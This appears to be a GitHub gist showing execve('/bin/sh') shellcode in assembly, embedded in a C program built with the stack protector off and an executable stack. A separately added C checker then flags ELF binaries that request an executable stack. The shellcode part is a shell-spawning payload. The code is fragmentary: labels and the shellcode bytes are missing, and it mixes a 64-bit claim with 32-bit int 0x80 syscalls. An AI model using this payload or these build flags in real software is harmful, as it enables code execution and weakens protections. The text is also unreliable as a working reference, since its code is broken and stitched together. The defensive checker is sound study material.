@mgeeky mgeeky/execve.c
Created Nov 17, 2016

Example of simple execve("/bin/sh", ...) shellcode, embedded in C program.
* Example of simple execve('/bin/sh', ...); shellcode compiled
* and embedded within C program, then compiled on 64-bit with NX bit
* turned off and set executable stack.
* Compilation:
* $ gcc -fno-stack-protector -z execstack execve1.c -o execve1c
; Compilation: nasm -f bin file.asm -o file.bin
global _start
jmp short calleip
pop rsi
xor rax, rax
mov byte [rsi + 7], al
lea rbx, [rsi]
mov qword [rsi + 8], rbx
mov qword [rsi + 16], rax
mov byte al, 0x0b ; execve
mov rbx, rsi
lea rcx, [rsi + 8]
lea rdx, [rsi + 16]
; execve('/bin/sh', { '/bin/sh', 0}, 0);
int 0x80
call shellcode
; Buffer containing parameters to be passed
; to execve(); At the 0 position it starts with
; /bin/sh path. Then at the position of 'A' will be
; null byte inserted effectively ending the string.
; Then the address of /bin/sh itself is going to be
; inserted in place of 'BBBBBBBBB' sequence and followed by
; 'CCCCCCCC' substituted by 00000000 qword value ending array.
char shellcode[64] =
int main()
int (*func)();
func = (int (*)())shellcode;
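
The build line above passes `-z execstack`, which sets the execute bit on the binary's `PT_GNU_STACK` program header. As an added example (not part of the original gist), the checker below reads that header from an ELF64 image so that binaries built this way can be flagged; the function names and the 120-byte sample image are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK_ID 0x6474e551u /* p_type of the stack-permission header */
#define PF_X_BIT 0x1u               /* execute bit in p_flags */

/* Read an n-byte little-endian unsigned integer. */
static uint64_t rd_le(const unsigned char *p, int n)
{
    uint64_t v = 0;
    while (n-- > 0) v = (v << 8) | p[n];
    return v;
}

/* 1: executable stack requested, 0: non-executable, 2: no PT_GNU_STACK
 * (kernel/architecture default applies), -1: not a usable ELF64 LE image. */
int elf64_stack_is_executable(const unsigned char *img, size_t len)
{
    if (len < 64 || memcmp(img, "\x7f" "ELF", 4) != 0) return -1;
    if (img[4] != 2 || img[5] != 1) return -1; /* ELFCLASS64, ELFDATA2LSB */
    uint64_t phoff = rd_le(img + 0x20, 8);     /* e_phoff */
    uint64_t phentsize = rd_le(img + 0x36, 2); /* e_phentsize */
    uint64_t phnum = rd_le(img + 0x38, 2);     /* e_phnum */
    if (phentsize < 56 || phoff > len) return -1;
    for (uint64_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + i * phentsize;
        if (off > len || len - off < 56) return -1; /* header out of bounds */
        if (rd_le(img + off, 4) == PT_GNU_STACK_ID)
            return (rd_le(img + off + 4, 4) & PF_X_BIT) ? 1 : 0;
    }
    return 2;
}

/* Constructed sample: a 64-byte ELF64 header followed by one PT_GNU_STACK
 * program header with the given p_flags. Not a loadable binary. */
void make_sample(unsigned char *img, uint32_t p_flags)
{
    memset(img, 0, 120);
    memcpy(img, "\x7f" "ELF\x02\x01\x01", 7);  /* magic, 64-bit, LE, version */
    img[0x20] = 64; img[0x36] = 56; img[0x38] = 1;
    memcpy(img + 64, "\x51\xe5\x74\x64", 4);   /* p_type = PT_GNU_STACK */
    img[68] = (unsigned char)p_flags;          /* low byte: PF_R|PF_W|PF_X */
}

int main(void)
{
    unsigned char img[120];
    make_sample(img, 7); /* RWX, as -z execstack requests */
    printf("execstack sample: %d\n", elf64_stack_is_executable(img, sizeof img));
    make_sample(img, 6); /* RW */
    printf("rw sample:        %d\n", elf64_stack_is_executable(img, sizeof img));
    return 0;
}
```

On a real system, `readelf -lW <binary>` shows the same `GNU_STACK` entry, where an `E` in the flags column corresponds to a return value of 1 here.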